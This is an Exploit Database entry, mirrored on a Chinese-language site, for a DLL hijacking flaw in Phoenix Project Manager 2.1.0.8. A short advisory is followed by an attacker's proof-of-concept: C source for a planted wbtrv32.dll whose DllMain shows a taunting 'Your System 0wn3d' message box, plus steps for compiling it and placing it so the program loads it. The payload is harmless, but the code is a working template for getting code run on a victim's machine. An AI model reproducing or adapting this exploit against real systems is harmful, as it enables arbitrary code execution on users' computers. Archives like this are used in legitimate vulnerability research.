Phoenix Project Manager 2.1.0.8 – DLL Loading Arbitrary Code Execution

• Exploit Database
• 17 阅读

• 作者： anT!-Tr0J4n
  日期： 2010-10-19
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/34868/

• // source: https://www.securityfocus.com/bid/44198/info
  
  Phoenix Project Manager is prone to a vulnerability that lets attackers execute arbitrary code.
  
  An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
  
  Phoenix Project Manager 2.1.0.8 is vulnerable; other versions may also be affected. 
  
  ===================================================
  Phoenix DLL Hijacking Exploit (wbtrv32.dll)
  ===================================================
  
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
  0 _ __ __ __ 1
  1 /' \__/'__`\/\ \__/'__`\ 0
  0/\_, \___ /\_\/\_\ \ \___\ \ ,_\/\ \/\ \_ ___ 1
  1\/_/\ \ /' _ `\ \/\ \/_/_\_<_/'___\ \ \/\ \ \ \ \/\`'__\0
  0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
  1\ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
  0 \/_/\/_/\/_/\ \_\ \/___/\/____/ \/__/ \/___/\/_/ 1
  1\ \____/ >> Exploit database separated by exploit 0
  0 \/___/type (local, remote, DoS, etc.)1
  11
  0[+] Site: Inj3ct0r.com0
  1[+] Support e-mail: submit[at]inj3ct0r.com1
  00
  1 #########################################1
  0 I'm anT!-Tr0J4n member from Inj3ct0r Team1
  1 #########################################0
  0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
   
  
  /*
  #Phoenix DLL Hijacking Exploit (wbtrv32.dll)
  #Author: anT!-Tr0J4n
  #Greetz: Dev-PoinT.com ~ inj3ct0r.com~ All Dev-poinT members and my friends
  #Email: D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com
  #Software : http://www.phoenixcpm.com/
  #Tested on: Windows? XP sp3
  #Home : www.Dev-PoinT.com$ http://inj3ct0r.com $ http://0xr00t.com
  
  
  ==========================
  HowTO use : Compile and rename towbtrv32.dll, create a file in the same dir with one of the following extensions.
  check the result > Hack3d
  ==========================
  
  
  # wbtrv32.dll(code)
  */
   
  #include "stdafx.h"
   
  void init() {
  MessageBox(NULL,"Your System 0wn3d BY anT!-Tr0J4n", "inj3ct0r",0x00000003);
  }
   
   
  BOOL APIENTRY DllMain( HANDLE hModule,
   DWORDul_reason_for_call,
   LPVOID lpReserved
   )
  {
  switch (ul_reason_for_call)
  {
  case DLL_PROCESS_ATTACH:
   init();break;
  case DLL_THREAD_ATTACH:
  case DLL_THREAD_DETACH:
   case DLL_PROCESS_DETACH:
  break;
  }
  return TRUE;
  }
  
  ============================================
  
  special thanks to : r0073r ; Sid3^effects ; L0rd CrusAd3r ; all Inj3ct0r 31337 Member
  
  =============================================